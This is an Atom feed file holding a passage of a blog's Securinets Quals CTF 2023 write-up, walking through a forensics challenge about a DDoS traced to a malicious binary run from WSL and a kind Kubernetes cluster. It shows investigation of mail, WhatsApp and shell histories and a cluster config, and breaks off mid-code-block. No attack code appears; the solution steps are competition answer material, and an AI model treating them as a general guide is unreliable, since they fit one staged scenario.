atom.xml

<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <id>http://example.com</id>
    <title>4n6 &amp; k8s</title>
    <link href="http://example.com" />
    <updated>2023-08-06T18:00:00.000Z</updated>
    <category term="kubernetes" />
    <entry>
        <id>http://example.com/2023/08/06/Writeups/quals2023/</id>
        <title>Securinets Quals CTF 23 Forensics &amp; Misc Challenges Writeup</title>
        <link rel="alternate" href="http://example.com/2023/08/06/Writeups/quals2023/"/>
        <content type="html">&lt;h2 id=&#34;the-ctf&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-ctf&#34;&gt;#&lt;/a&gt; The CTF&lt;/h2&gt;
&lt;p&gt;Securinets Quals CTF was this Securinets generation’s first CTF event on CTFTime where all the big teams have demonstrated therir skills to get to the finals in Tunisia this late-September.&lt;/p&gt;
&lt;p&gt;We present four challenging tasks, two forensics involving Containerization and Kubernetes, Hiberfil.sys, Restore Point, and Crypto-currency Wallet, and two Misc involving Steganography and Reverse Engineering a set-top-box firmware and analyzing its memory dump.&lt;/p&gt;
&lt;p&gt;Congratulations to SKSD, r3kapig, Hexagon for earning the top 3 spots in the CTF, and we deliver a special apperciation to the Securinets masterminds for their hard work and dedication to make this event a huge success, and we hope to see you all in the finals.&lt;/p&gt;
&lt;p&gt;First, our new CTF weight:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/n9elp7B.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The scoreboard:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/eYBMvzh.jpg&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;the-betrayers&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-betrayers&#34;&gt;#&lt;/a&gt; The Betrayers&lt;/h2&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/lAWQkqM.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h3 id=&#34;description&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#description&#34;&gt;#&lt;/a&gt; Description:&lt;/h3&gt;
&lt;p&gt;An IT company provides a critical service to customers. One day, the service is attacked by DDoS. The Attack is originated from within the company’s internal network, and that each compromised host was sending a large number of requests to the server.&lt;/p&gt;
&lt;p&gt;The attack occurred shortly after the company installed a new patch to one of its software programs. Every new version should be hosted by a special web server with DNS record in the private network but this time the new version is hosted by the Technical Director server!!!&lt;/p&gt;
&lt;p&gt;The Technical Director is in trouble and he said that is not the attacker!&lt;/p&gt;
&lt;p&gt;The strange thing is that the program is deleted directly after the blue team figure out the attack!&lt;/p&gt;
&lt;p&gt;We need to get a release from that version and figure out how the attack occur!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The binary expect to do DDoS attack on specifc IP. In this challenge we changed the IP and the rate of send requests&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Author: &lt;strong&gt;Raf²&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;File: &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xUU5VbmQ0Q0VYWHJxQUM5Y252bFVFLUFXLWFlV0RzemQvdmlldz91c3A9c2hhcmluZw==&#34;&gt;Download&lt;/span&gt;&lt;/p&gt;
&lt;h3 id=&#34;write-up&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#write-up&#34;&gt;#&lt;/a&gt; Write-up&lt;/h3&gt;
&lt;p&gt;Ok Let’s figure out what is happen. We get the disk image of the Technical Director system. The system that host the new program patch. (It must not be this one)&lt;/p&gt;
&lt;p&gt;Let’s start figure out what softwares are installed and check the history of the system.&lt;/p&gt;
&lt;p&gt;Oh as expected there is a mail software. It’s thunderbird. We will check it later.&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/y6i9bfK.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s Check the browsing history of the system and check what is going on here! We found Edge only here!&lt;/p&gt;
&lt;p&gt;Go to  &lt;code&gt;C:\Users\Kong Office\AppData\Local\Edge\UserData\Default&lt;/code&gt;  and check the  &lt;code&gt;History&lt;/code&gt;  database&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/E1oNXEo.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;After checking every single link and search. we found searchs about whatsapp desktop how to install it and official whatsapp download website is visited.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/geAQL42.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Thunderbird is installed for sure. But still no clue for whatsapp for now. Let’s see what we have on the inbox now! It’s time to check the mails! To check the inbox you can go to  &lt;code&gt;C:\Users\Kong Office\AppData\Roaming\Thunderbird\Profiles\0ppw4tlt.default-release\ImapMail\imap.gmail.com&lt;/code&gt;  and investigate the  &lt;code&gt;INBOX&lt;/code&gt;  file&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/1J4A8Bx.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;You can open the file using any text editor to check the mails but it’s the worst way. you’ll find the attachements encoded to base 64 and many trashy details&lt;/p&gt;
&lt;p&gt;You’ll get an ugly view like this if you open it with vscode.&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/bH5fHr5.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;But you can choose any thunderbird inbox viewer available in the internet. I tried a random one and i got a better exeperience to understand what happen.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/6T7zVMC.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s summerize what we found. One mail telling that the kubernetes cluster is updgraded successfully from the platform engineer, another one from a system adminstration telling the Technical Director about the security updates. Another one from  &lt;code&gt;Securinets INSAT&lt;/code&gt;  asking for sponsorship to the National Cyber Security Congress! And the suspicision one is from a dummy mail  &lt;code&gt;4n6nk8s@gmail.com&lt;/code&gt; . In this mail we found a clue!&lt;br&gt;
A stranger tell the Technical Director about deploying a malicious binary and send a mega link! Ahhh Protected one&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/zalrPXh.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The link lead you to a wordlist that have strong and secure passwords. The mail talks about subsystem!! What a subsystem? Is it a  &lt;code&gt;WSL&lt;/code&gt;  ??&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/1Sfnhxu.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;and here we finished mail browser history and mail investigation. still the whatsapp thing! Where is whatsapp hide his data?? good question. Checking AppData don’t help us. We didn’t find any WhatsApp directory!&lt;/p&gt;
&lt;p&gt;After googling we found that there is some whatsapp version can store his data inside  &lt;code&gt;%AppData%\Local\Packages&lt;/code&gt; . Let’s check that folder and Bingoo!! We found whatsapp directory! WhatsApp was installed here! Let’s see what we can do here!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/4x79Dni.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;You can find some conversation inside  &lt;code&gt;messages.db&lt;/code&gt;  file. It might be encrypted and it might be decrypted. Let’s try to open this database and see what we can find here!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/mfM1duI.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;I am chocked!! Two employees were behind all this!!&lt;br&gt;
Two employees hate the director and they want to be in a trouble!&lt;/p&gt;
&lt;p&gt;The attackers talks about encryption and subsystem password and they are shocked because the system is windows! and yes the mega decryption key is shared in this discussion. They send the mail to the director to make it in trouble!!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/8ATiHDP.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s download that wordlist and check the powershell history commands! I am sure there is something there. Because I found Hyber-V directory in random place while investigating. The history is stored in  &lt;code&gt;%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history. txt&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/GnecotB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Yeah! Everything is cleared now! subsytem, subsystem! They are talking about WSL. WSL is installed here! and it used to host the malicious program! But what they does mean by encryption and the password. Mmmmm I guess we will face some cracking in the few next minutes!&lt;/p&gt;
&lt;p&gt;Let’s check WSL now! Where is windows store the WSL? Just check  &lt;code&gt;%userprofile%\AppData\Local\Packages&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/wIfONXj.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s mount this vhdx disk now in our Linux/WSL and check the files in this system. You can use  &lt;code&gt;libguestfs-tools&lt;/code&gt;  to achieve this.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ sudo apt-get install libguestfs-tools&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Then, you can mount now the wsl disk image:&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/0QqjpLl.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We found a user named  &lt;code&gt;Kong&lt;/code&gt;  and have a home directory. Let’s check his files and bash history!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/W7p1CnE.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s start with  &lt;code&gt;.bash_history&lt;/code&gt;  first. It’s my number one rule!&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/7kXO7nj.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Wow! The attacker configure wsl.conf then install docker! Mmm He configure it to be boot with systemd!&lt;br&gt;
Then he installed something called kind, After that he download  &lt;code&gt;kubectl&lt;/code&gt; ! Kubectl??? Ah It’s  &lt;code&gt;Kubernetes&lt;/code&gt;  time!&lt;/p&gt;
&lt;p&gt;But what is kind? Searching on it. I found that kind is Kubernetes inside Docker. It’s a lightweight kubernetes cluster.&lt;/p&gt;
&lt;p&gt;There is 3 yaml files. For sure there are worth to check! Let’s see what is inside these files!&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;44&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;45&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;46&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;47&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;48&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;49&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;50&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;51&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;52&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;### k-config.yaml content ####&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Cluster&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kind.x-k8s.io/v1alpha4&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;networking:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;podSubnet:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;10.244.0.0/16&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;serviceSubnet:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;10.96.0.0/12&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;comment&#34;&gt;# the default CNI will not be installed&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;disableDefaultCNI:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;           &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;nodes:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;role:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;control-plane&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;comment&#34;&gt;# add a mount from /path/to/my/files on the host to /files on the node&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;extraMounts:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;hostPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/etc/crio/crio.conf&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;containerPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/etc/crio/crio.conf&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# optional: if set, the mount is read-only.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# default false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;readOnly:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# default false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;selinuxRelabel:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;hostPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/etc/kubernetes&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;containerPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/etc/kubernetes&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# optional: if set, the mount is read-only.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# default false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;readOnly:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# default false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;selinuxRelabel:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;hostPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/var/lib/netcd&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;containerPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/var/lib/etcd&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# optional: if set, the mount is read-only.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# default false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;readOnly:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# default false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;selinuxRelabel:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;role:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;worker&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;kubeadmConfigPatches:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;|&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;    kind: JoinConfiguration&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;    nodeRegistration:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;      kubeletExtraArgs:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;        node-labels: &amp;quot;app-type=web-app&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;&lt;/span&gt;  &lt;span class=&#34;attr&#34;&gt;extraPortMappings:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;containerPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;30999&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;hostPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# optional: set the bind address on the host&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# 0.0.0.0 is the current default&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;listenAddress:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;0.0.0.0&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# optional: set the protocol to one of TCP, UDP, SCTP.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# TCP is the default&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;protocol:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;TCP&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;It’s a kind cluster configuration file!! This fiel is used to declare the specification of your cluster! And as you see  &lt;code&gt;/etc/kubernetes&lt;/code&gt;  and  &lt;code&gt;/var/lib/etcd&lt;/code&gt;  are mounted. We have 2-node cluster and a  &lt;code&gt;extraPortMappings&lt;/code&gt;  to expose a service. In addition there is node-labels on the worker-node&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This challenge requires some kubernetes knowledge. You must be familiar with the basics of the kubernetes. Like nodes, deployements, pods, services, etc…&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span 